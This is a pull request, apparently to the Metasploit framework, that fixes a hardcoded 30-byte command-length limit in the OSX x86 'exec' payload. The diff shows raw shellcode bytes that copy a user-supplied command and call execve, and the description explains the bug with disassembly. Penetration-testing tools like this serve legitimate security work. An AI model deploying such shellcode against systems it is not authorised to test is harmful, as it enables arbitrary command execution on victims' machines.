### PR TITLE
bug fix for hardcoded max command length

### DIFF
--- a/modules/payloads/singles/osx/x86/exec.rb
+++ b/modules/payloads/singles/osx/x86/exec.rb
@@ -30,7 +30,7 @@ module Metasploit3
 			'Name'          => 'OSX Execute Command',
 			'Version'       => '$Revision$',
 			'Description'   => 'Execute an arbitrary command',
-			'Author'        => 'snagg <snagg[at]openssl.it>',
+			'Author'        => [ 'snagg <snagg[at]openssl.it>', 'argp <argp[at]census-labs.com>' ],
 			'License'       => BSD_LICENSE,
 			'Platform'      => 'osx',
 			'Arch'          => ARCH_X86))
@@ -47,12 +47,14 @@ module Metasploit3
 	#
 	def generate
 		cmd     = datastore['CMD'] || ''
+		len     = cmd.length + 1
 		payload =
-			"\x31\xc0\x50"+
-			Rex::Arch::X86.call(cmd.length + 1) + cmd +
-			"\x00\x5e\x89\xe7\xb9\x1e\x00" +
+			"\x31\xc0\x50" +
+			Rex::Arch::X86.call(len) + cmd +
+			"\x00\x5e\x89\xe7\xb9" + Rex::Arch::X86.pack_word(len) +
 			"\x00\x00\xfc\xf2\xa4\x89\xe3\x50" +
 			"\x50\x53\xb0\x3b\x50\xcd\x80"
+
 	end
 
 end


### PR DESCRIPTION
The bug was in the hardcoded max command length (30 or 0x1e) used in the repne movsb instruction:

B91E000000        mov ecx, 0x1e
FC                          cld
F2A4                      repne movsb

Therefore, when the CMD parameter was longer than 30 characters, only the first 30 characters were copied.

My submitted fix uses Rex::Arch::X86.pack_word() to patch the shellcode with the length of the user provided CMD.
